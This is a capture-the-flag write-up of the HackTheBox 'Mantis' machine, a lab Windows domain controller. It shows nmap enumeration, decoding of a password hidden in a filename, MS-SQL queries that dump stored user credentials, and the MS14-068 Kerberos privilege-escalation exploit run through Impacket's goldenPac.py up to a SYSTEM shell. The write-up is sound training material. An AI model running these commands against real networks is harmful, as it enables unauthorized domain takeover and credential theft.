Booj thoughts on security
HackTheBox - Mantis
This writeup details attaching the Mantis machine from HackTheBox.
In short this machine looked indomitable at the start with it’s ridiculous list of open ports. Targeted enumeration, however, reveals that it’s not as bad as first expected.
Chapters:
Topics:
- MS-SQL Enumeration
- MS14-068 Active Directory Exploit
Enumeration
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 13:46:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2017-09-17T01:35:45
|_Not valid after: 2047-09-17T01:35:45
|_ssl-date: 2017-09-17T13:47:20+00:00; +7s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
50255/tcp open unknown
54393/tcp open msrpc Microsoft Windows RPC
54398/tcp open msrpc Microsoft Windows RPC
That is a long list of ports! We need to see what we can identify about this from the port scan and attack the high value ports first.
From port 88, the kerberos port we can deduce that this machine is a member of a Windows Active Directory Environment. Port 389, the LDAP service port, confirms this suspicion. From this information we can make the reasonable assumption that we are attacking a Windows Domain Controller.
The machine is also running web-services on port 1337 and port 8080. 1337 merely shows the default IIS index page, whilst 8080 has a blog powered by Orchard CMS:
Running a dirbuster on both services reveals that a/secure_notes/ directory exists on port 1337. Inside we see two files:
web.config isn’t actually readable but let’s have a look inside dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
So we know there’s a database user called admin used to create the orcharddb database, but we’re still in need of a password. Looking at the filename, the last part of the filename looks like it’s a base64 encoded string. We can decode this quite easily:
>>> import base64
>>> base64.b64decode('NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx')
'6d2424716c5f53405f504073735730726421'
The result of the decoding is a hex string. It could be a hash, but to ensure it’s not just hex-encoded, we run a quick decode:
>>> '6d2424716c5f53405f504073735730726421'.decode('hex')
'm$$ql_S@_P@ssW0rd!'
Well that looks like our MS-SQL password!
MS-SQL Credentials
For MS-SQL, metasploit has a number of inbuilt modules, but I’ve found them to be fairly buggy in the past, so working with sqsh allows us to manually enumerate with the database.
The password implies it’s for the sa user, but connecting with that yields no result. Connecting with username admin however, does. We use the following:
sqsh -U admin -S 10.10.10.52
As a quick aside, it’s worthwhile to check whenever working with an MS-SQL database is the presence of higher privileges. We can check these manually, but a quick check is to see if you can access advanced options. As we see below, we don’t have the necessary permissions:
1> exec sp_configure 'show advanced options', 1
2> go
Msg 15247, Level 16, State 1
Server 'MANTIS\SQLEXPRESS', Procedure 'sp_configure', Line 105
User does not have permission to perform this action.
(return status = 1)
Enumerating the database, we check the OrchardDB for the presence of any left over user records:
1> SELECT Username, Password FROM blog_Orchard_Users_UserPartRecord;
2> go
This yields the following user accounts:
admin:Password1234
James:J@m3s_P@ssW0rd!
We test both credentials on a number of services, but it turns out he’s not even a user within the installed OrchardCMS on port 8080. Trying it on a number of services, it turns out he’s a user on the Windows Machine itself.
root@kali:~# nmap -sU -sS --script smb-os-discovery.nse -p U:139,T:139 10.10.10.52
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-23 15:59 EST
Nmap scan report for MANTIS.HTB.LOCAL (10.10.10.52)
Host is up (0.071s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
139/udp closed netbios-ssn
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2018-02-23T15:59:13-05:00
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
root@kali:/tmp/impacket/examples# smbclient -U James -W HTB \\\\MANTIS\\NETLOGON
WARNING: The "syslog" option is deprecated
Enter HTB\James's password:
Try "help" to get a list of possible commands.
smb: \>
MS14-068
In short, the vulnerability targeted the kerberos service, and allowed any user to elevate their permissions from regular user, to domain admin by forging a kerberos ticket. This is quite a well known exploit and it’s always worth checking if interacting with an out of date domain controller if you have a lower privileged user.
The Impacket goldenPac script is about as point-and-click as this attack gets in all honesty. It handles the more annoying parts such as fetching the SID, and authorizing with the kerberos ticket. We run it as below and are almost instantly returned a shell:
root@kali:/tmp/impacket/examples# python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[-] Couldn't get forest info ([Errno Connection error (htb.local:445)] [Errno -2] Name or service not known), continuing
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file rFgUlpSB.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service RKhU on 10.10.10.52.....
[*] Starting service RKhU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
References
https://labs.mwrinfosecurity.com/blog/digging-into-ms14-068-exploitation-and-defence/
https://www.trustedsec.com/2014/12/ms14-068-full-compromise-step-step/
https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
http://blog.liatsisfotis.com/knock-and-pass-kerberos-exploitation.html